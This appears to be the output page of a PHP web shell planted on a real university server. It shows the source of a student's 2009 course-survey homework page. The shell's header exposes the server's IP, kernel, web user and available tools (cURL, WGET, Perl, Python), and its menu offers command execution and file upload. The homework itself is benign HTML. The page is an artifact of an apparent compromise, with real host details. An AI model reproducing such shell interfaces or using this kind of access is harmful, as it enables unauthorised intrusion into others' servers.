Server IP : 172.16.15.8 / Your IP : 3.147.75.46 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ndlutz/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Author: Nathan Lutz Instructor: Dr. Wang Filename: hw9.php Goal: Online Course Survey DBMS. To create a interactive survey using datatbases. Due: 4/20/09 --> <html> <head> <title>Course Survey</title> <link href="default.css" rel="stylesheet" type="text/css" /> </head> <BODY> <div id="header"> <div id="menu"> <ul> <li class="active"><a href="http://student.vwc.edu/~ndlutz/">Home</a></li> <li><a href="http://student.vwc.edu/~ndlutz/images/gindex.html">Gallery</a></li> <li><a href="http://zeus.vwc.edu/~ndlutz/index.html">PHP</a></li> <li><a href="http://student.vwc.edu/~ndlutz/aboutme.html">About</a></li> </ul> </div> </div> <hr /> <div id="wrapper"> <div id="page"> <div id="entry"> <h1>Welcome to the <u>Online Course Survey DBMS</u>.</h1> <hr> <div id="program"> <p><h2>Please select an action:</h2></p> <!-- <form method="link" action="hw9create.php"> <INPUT TYPE="submit" VALUE="Create a table"> </form> --> <form method="link" action="hw9survey.php"> <INPUT TYPE="submit" VALUE="Enter the survey info"> </form> <form method="link" action="hw9results.php"> <INPUT TYPE="submit" VALUE="See your submitted data."> </form> <p></p> </div> </div> </div> </div> </body> </html>